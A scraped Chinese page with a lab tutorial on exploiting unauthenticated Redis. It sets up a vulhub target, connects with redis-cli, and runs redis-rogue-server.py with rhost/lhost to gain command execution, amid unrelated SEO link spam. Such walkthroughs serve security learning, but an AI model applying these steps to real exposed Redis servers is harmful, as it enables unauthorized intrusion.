当前位置: 首页 > news >正文

漂亮的门户网站腾讯云域名购买

漂亮的门户网站,腾讯云域名购买,字体设计图片素材,网站制作外包价格一、漏洞信息 redis默认情况下会绑定在本地6379端口,如果没有进行采用相关的策略,就会将redis服务暴露到公网上,如果再没有设置密码认证(一般为空)的情况下,会导致任意用户可以访问到目标服务器的情况下未授权访问redis以及读取r…

一、漏洞信息

redis默认情况下会绑定在本地6379端口,如果没有进行采用相关的策略,就会将redis服务暴露到公网上,如果再没有设置密码认证(一般为空)的情况下,会导致任意用户可以访问到目标服务器的情况下未授权访问redis以及读取redis的数据。

二、漏洞利用条件

1.redis绑定在6379端口且没有添加防火墙规则避免其他非信任ip访问等安全策略
2.没有设置密码认证,可以免密码远程登陆redis服务

三、环境搭建

这里使用vulhub里面的redis/4-unacc靶场

cd /vulhub/redis/4-unacc        #进入靶场所在目录
docker-compose up -d        #一键启动容器环境
docker ps        #查看是否开启容器

四、漏洞复现

1.在kali上安装redis程序进行服务的链接

apt-get install redis        #安装redis服务
redis常用命令:
1.查看信息:info
2.删除所有数据库内容:flushall
3.刷新数据库:flushdb
4.保存:save
5.设置路径等配置:config set dir dirpath
如果提示无法安装,可能需要更新以下kali源,使用以下命令:
apt-get update

2.使用kali对redis服务进行远程链接

redis-cli -h ip -p 6379        #通过远程链接至redis服务

如果可以直接执行命令且不需要认证说明存在未授权访问漏洞

3.使用脚本工具获取目标的命令执行环境

python3 redis-rogue-server.py --rhost ip --lhost ip

成功获取到目标主机的命令执行环境

http://www.mmbaike.com/news/101568.html

相关文章:

  • wordpress图片抓取插件百度排名优化
  • 企业网站功能需求文档好搜搜索引擎
  • 做奶茶店网站代写文章
  • 我爱我家二手房房源官网温州seo招聘
  • wordpress自定义排版济南网站优化排名推广
  • 怎样做静态网站今日小说排行榜百度搜索风云榜
  • 兴义做网站网络营销常用的工具
  • 临安做网站的公司推广普通话手抄报内容资料
  • 个人网站页面模板专业的营销团队哪里找
  • 给周杰伦做网站seo站内优化包括
  • 长春网站建设于健域名申请哪家好
  • 电子商务电商网站饿建设销售管理系统
  • 怎么做html网站公司运营策划方案
  • 教师在哪些网站可以做兼职连云港百度推广总代理
  • 惠州有做网站的吗什么是seo教程
  • 做门窗五金的网站win10优化软件哪个好
  • 什么网站可以看到绵阳建设seo技术培训宁波
  • wordpress主机科学新概念seo外链
  • 如何快速做网站2022年最好用的搜索引擎
  • 响应式网站排名北京最新疫情情况
  • 深圳市公司网站建设西安seo代理计费
  • 用自己电脑配置服务器做网站上海品牌推广公司
  • 2003 建设网站上海网络推广专员
  • 专业做网站照片如何免费推广自己的网站
  • 个人做网站需要备案吗河南网站推广优化排名
  • 做花茶网站解说做一套二级域名网站怎么做
  • 营销型网站建设范文网站的seo优化报告
  • 郴州市政府门户网站微软bing搜索引擎
  • 左右左布局网站建设培训机构
  • 昆明市住房城乡建设委网站软文营销步骤